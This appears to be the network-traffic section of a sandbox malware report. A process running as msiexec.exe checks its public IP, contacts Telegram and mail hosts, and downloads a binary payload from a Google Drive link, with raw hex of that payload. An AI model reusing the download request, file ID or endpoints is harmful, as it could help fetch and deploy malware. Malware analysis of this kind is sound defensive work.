                                                                                                                                                            Jan 11, 2025 00:07:33.867261887 CET1.1.1.1192.168.2.100x8fa3No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:07:45.030822039 CET1.1.1.1192.168.2.100x36bbNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:07:52.433075905 CET1.1.1.1192.168.2.100x7948No error (0)mail.abraher.comabraher.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:07:52.433075905 CET1.1.1.1192.168.2.100x7948No error (0)abraher.com82.194.91.193A (IP address)IN (0x0001)false
                                                                                                                                                            • drive.google.com
                                                                                                                                                            • drive.usercontent.google.com
                                                                                                                                                            • reallyfreegeoip.org
                                                                                                                                                            • api.telegram.org
                                                                                                                                                            • checkip.dyndns.org
                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            0192.168.2.1049980132.226.247.73805752C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Jan 11, 2025 00:07:32.563517094 CET151OUTGET / HTTP/1.1
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Jan 11, 2025 00:07:33.236788034 CET273INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:07:33 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 104
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                            Jan 11, 2025 00:07:33.242609978 CET127OUTGET / HTTP/1.1
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                                            Jan 11, 2025 00:07:33.452517986 CET273INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:07:33 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 104
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                            Jan 11, 2025 00:07:34.599915981 CET127OUTGET / HTTP/1.1
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                                            Jan 11, 2025 00:07:34.812510967 CET273INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:07:34 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 104
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            1192.168.2.1049983132.226.247.73805752C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Jan 11, 2025 00:07:35.448026896 CET127OUTGET / HTTP/1.1
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                                            Jan 11, 2025 00:07:36.149410009 CET273INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:07:36 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 104
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            2192.168.2.1049985132.226.247.73805752C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Jan 11, 2025 00:07:36.812865019 CET151OUTGET / HTTP/1.1
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Jan 11, 2025 00:07:37.586335897 CET273INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:07:37 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 104
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            3192.168.2.1049987132.226.247.73805752C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Jan 11, 2025 00:07:38.190526962 CET151OUTGET / HTTP/1.1
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Jan 11, 2025 00:07:38.880357027 CET273INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:07:38 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 104
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            4192.168.2.1049989132.226.247.73805752C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Jan 11, 2025 00:07:39.510941982 CET151OUTGET / HTTP/1.1
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Jan 11, 2025 00:07:40.288095951 CET273INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:07:40 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 104
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            5192.168.2.1049991132.226.247.73805752C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Jan 11, 2025 00:07:40.902813911 CET151OUTGET / HTTP/1.1
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Jan 11, 2025 00:07:41.576138973 CET273INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:07:41 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 104
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            6192.168.2.1049993132.226.247.73805752C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Jan 11, 2025 00:07:42.284938097 CET151OUTGET / HTTP/1.1
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Jan 11, 2025 00:07:42.972179890 CET273INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:07:42 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 104
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            7192.168.2.1049995132.226.247.73805752C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Jan 11, 2025 00:07:43.620126009 CET151OUTGET / HTTP/1.1
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Jan 11, 2025 00:07:44.300144911 CET273INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:07:44 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 104
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            0192.168.2.1049978142.250.184.2384435752C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-10 23:07:28 UTC216OUTGET /uc?export=download&id=1XsJ-IQr2GvwbKOJx-mhThEFAjDp4uHiL HTTP/1.1
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                            Host: drive.google.com
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            2025-01-10 23:07:28 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:07:28 GMT
                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=1XsJ-IQr2GvwbKOJx-mhThEFAjDp4uHiL&export=download
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                            Content-Security-Policy: script-src 'nonce-25xzzes9FsJ5c5ri_xCTnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                            Server: ESF
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                            Connection: close


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            1192.168.2.1049979142.250.181.2254435752C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-10 23:07:29 UTC258OUTGET /download?id=1XsJ-IQr2GvwbKOJx-mhThEFAjDp4uHiL&export=download HTTP/1.1
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2025-01-10 23:07:31 UTC4941INHTTP/1.1 200 OK
                                                                                                                                                            X-GUploader-UploadID: AFiumC5r6mmco13LEUHc4gSJrDKWis9ZtOg_qomI2mRQ32xM_o9JpX1fhvNptZ16SOlAfAFrICOSngM
                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                            Content-Security-Policy: sandbox
                                                                                                                                                            Content-Security-Policy: default-src 'none'
                                                                                                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                            X-Content-Security-Policy: sandbox
                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                            Cross-Origin-Resource-Policy: same-site
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Content-Disposition: attachment; filename="EfhhZmQaVp101.bin"
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Allow-Credentials: false
                                                                                                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Content-Length: 277056
                                                                                                                                                            Last-Modified: Mon, 09 Dec 2024 11:07:00 GMT
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:07:31 GMT
                                                                                                                                                            Expires: Fri, 10 Jan 2025 23:07:31 GMT
                                                                                                                                                            Cache-Control: private, max-age=0
                                                                                                                                                            X-Goog-Hash: crc32c=ajME7Q==
                                                                                                                                                            Server: UploadServer
                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                            Connection: close
                                                                                                                                                            2025-01-10 23:07:31 UTC4941INData Raw: 6b f6 ff 74 e6 b0 84 3d f5 d7 e1 a1 16 79 dc 66 63 6e 0d 4f 55 59 d2 6b 76 81 d8 ef b8 41 94 fc 84 3f 52 11 ef 59 2e 54 ff 3c 57 be e5 97 03 e9 9f 9c 69 ea 7f 3d d9 52 4d b2 dd d7 f5 14 13 65 53 81 13 d1 4a af e0 5e e3 95 0b fe 69 76 f2 8d af d5 ba 4e 20 cd 01 82 d9 eb b0 d5 6f 8c 0b 5c 33 81 23 cc f7 cc 78 2c d6 48 4a f6 f9 90 f7 ae 35 49 34 9c a7 b2 b2 ca ef b1 97 45 d0 8a e0 39 cb 2a cd a5 13 5d 0a c2 32 0d 94 d9 37 98 4d da e1 39 40 31 ad dd ea 15 3d 21 ee a5 c8 72 c5 aa b5 e4 3b cb c0 4d d8 a4 d1 0f 92 18 94 e4 b4 c7 a8 8f 8d 76 ff b8 d7 c1 c3 ee db 44 59 af f6 18 9b d8 07 7b c6 9c d9 d5 9c f4 b9 4d 4f c8 78 66 0d 62 3f d1 31 27 e3 21 b6 80 27 14 b1 e2 75 c9 72 ed 45 15 e5 79 5d 41 36 a2 48 5d 78 6f 98 c3 b1 a1 c1 11 4a 12 21 ab 7c b5 9f a1 51 78 dc
                                                                                                                                                            Data Ascii: kt=yfcnOUYkvA?RY.T<Wi=RMeSJ^ivN o\3#x,HJ5I4E9*]27M9@1=!r;MvDY{MOxfb?1'!'urEy]A6H]xoJ!|Qx
                                                                                                                                                            2025-01-10 23:07:31 UTC4819INData Raw: 1f 15 0e a6 a9 a9 a4 92 a2 0d 0c d7 cc 48 07 c6 06 cd 19 1a 05 de 48 ac 05 92 46 36 a7 90 cd 0b 8d 94 8a b0 c6 1d 8e 96 32 67 f4 fd c9 12 cd e6 3b ca c6 b3 7c e6 9a 9f 28 8f 94 98 26 5a 7c 75 a7 32 55 e4 c6 70 44 d9 c0 d1 df 47 9a 38 0c 73 00 ba e7 e4 d3 a1 cc 62 77 92 88 15 56 bc d3 02 20 30 d0 33 2a 37 37 58 ea 37 7f 16 a4 74 c7 4a e7 c9 98 f6 af ed e5 b0 fb 7a 08 22 82 ea a0 9a d9 0d 0a e9 f9 af 2d 99 be 58 b7 99 ca 32 05 44 db a8 b5 bc a7 bc 37 71 6d 5e 50 02 09 94 7c 7e fa 11 59 ac 0e 36 05 eb 42 85 67 6a d5 af 83 a8 3d 54 e7 ae 28 fe 67 6f ba bf f7 ff 67 ba 87 96 92 a4 25 21 f9 0a ee 6e c0 8e 66 91 29 cc bb f5 dd c7 53 65 ca 9b 5b e0 ec 29 de 04 c8 8e 0d f3 23 d0 90 7e 21 0c 40 ba 9f 95 5a 62 d3 61 bf 57 3c d3 8f 4c 01 6b 36 ce f4 24 ed 87 4d 59 ef
                                                                                                                                                            Data Ascii: HHF62g;|(&Z|u2UpDG8sbwV 03*77X7tJz"-X2D7qm^P|~Y6Bgj=T(gog%!nf)Se[)#~!@ZbaW<Lk6$MY
                                                                                                                                                            2025-01-10 23:07:31 UTC1390INData Raw: 5c 3c 0f 5b 5f f8 4a 2a a0 f4 2e f4 88 93 7d 8d 90 16 60 88 8e f2 53 2a 8a a1 95 b2 be 4c a4 7e c1 6b 1e 3a 9a 2f b9 2f ab 58 4c 32 21 37 b0 b2 27 7b 69 88 e0 53 b2 ee 2a e0 47 f9 b6 6b 34 c2 82 f7 d3 2f e0 b5 ec e7 e1 fb 72 4c ef 9b 39 a9 d6 4e 5b 8c 57 5b f6 d7 cf 4e e4 94 5b c6 d1 e8 ab 0c 81 a0 90 1d 2d 6a 3b 12 28 ec 42 0c 60 97 b9 38 c4 1e b0 2a 6e 51 04 c3 80 ae fd db 4d bd a0 1c 88 f2 e5 8c 3a c0 99 10 3e c0 6b 20 89 a3 ff 7f 3d 99 e7 59 3b 6f 13 76 59 28 e5 24 ee 8a 5d 0b eb 44 1f f9 54 ca 8b 8c 62 d2 69 2e 14 2a d7 1e 84 5f 5e c0 e9 e8 30 c4 b2 60 4a 6f 83 a9 0e bb 44 f5 35 c7 0d d5 2f 84 1c e1 01 89 6e 3b 95 e3 b6 79 61 ba 11 32 f4 8c 14 87 a8 2e 12 b7 c0 fb 99 ea 08 32 58 71 a2 fc a4 db 66 db 46 29 55 d6 1a 66 21 3d 4e 0d 8c 0e 4b e2 7b db 00
                                                                                                                                                            Data Ascii: \<[_J*.}`S*L~k://XL2!7'{iS*Gk4/rL9N[W[N[-j;(B`8*nQM:>k =Y;ovY($]DTbi.*_^0`JoD5/n;ya2.2XqfF)Uf!=NK{
                                                                                                                                                            2025-01-10 23:07:31 UTC1390INData Raw: 2d 44 7d 50 1a 3e e2 7f a2 a6 57 9e 8e 52 1e 1b b4 60 40 24 4a 03 16 d6 16 c1 e9 b1 ea d8 30 7e f6 a9 35 5c 93 61 fd f9 70 4b be 11 2e ba 47 e9 e2 83 0e b4 af c0 24 4e 8c 86 3a d9 25 da d0 c8 73 b2 b5 37 71 17 d5 a4 08 ab 5e 57 ae fe 70 9b 16 0c 6b dd b2 c0 3e bd 0a 13 99 68 59 78 40 bf 50 34 7f 6a d2 41 cb 19 8b c1 d2 22 57 2a bc ad c4 24 2f c9 18 d0 1d df 57 94 d4 be 1d 79 e8 06 b6 43 7f fa e1 91 f3 0c df 79 f3 b6 84 fd 36 69 6b e7 f2 f2 aa 94 a1 90 f2 75 ed 6a d5 91 0a d9 68 1d e8 11 e1 f9 ff 5e 6f b2 cf bc c9 84 6a 5c f1 be c8 bb 1b a6 79 7e 96 6b 5a a9 8b 45 b5 10 a4 bd 64 fe e2 cb 8d 92 1d 91 6a 51 ef 67 bd e3 0c 8c 70 9b 88 de cf a9 37 10 d2 07 5d 7b 9a 5e 30 26 fb b8 ad 70 18 66 73 9f 8c 6c 96 91 85 1d 78 ad 5f 65 bd 87 d1 28 e0 29 97 5a f1 eb 32
                                                                                                                                                            Data Ascii: -D}P>WR`@$J0~5\apK.G$N:%s7q^Wpk>hYx@P4jA"W*$/WyCy6ikujh^oj\y~kZEdjQgp7]{^0&pfslx_e()Z2
                                                                                                                                                            2025-01-10 23:07:31 UTC1390INData Raw: 94 db 4b 9a e6 b5 5a 81 80 ec 5b 44 03 46 57 98 6b 5e 41 6a be 9d ca f5 af c8 7c fd 68 a9 c2 9b 59 d0 ec cc 6d 33 41 03 14 ba 7d b3 88 2c d6 1a c2 36 55 2e 42 0e a5 32 e8 b4 1f ad 5d 8f 44 f8 c9 0e e8 68 5e 6a d2 48 d2 90 13 09 b4 21 f6 c3 35 4c 68 34 d5 82 89 8b 6d 2a 91 7e 31 45 bf a1 98 12 57 a0 3d 30 28 22 f2 cd 64 9d a9 32 33 d4 c7 a6 60 4e e3 b5 81 3b f3 b7 d1 49 a5 f3 54 e7 bd 69 fe 96 83 2c 8d 17 d5 ba 30 15 cd 01 86 eb 88 b2 d5 1f 9a 23 dd 33 81 29 da 09 cd 6b 27 c7 43 73 3d f8 90 f7 d0 1e 49 34 98 8f 59 b2 ca e5 a2 9b 3b 66 8a e0 3d b7 a2 66 ab 63 ff 2b 8e 13 b5 9f 83 04 b8 0a bf 99 47 59 98 df b2 8d 71 74 3a ce c6 a3 1c 8b c5 cd c4 59 86 97 3f ad c0 f1 18 d7 38 d0 af cf 33 c5 e0 e3 00 df c7 73 da e7 9e a5 69 59 af f2 6a 64 8c 07 0b 9b 93 f2 00
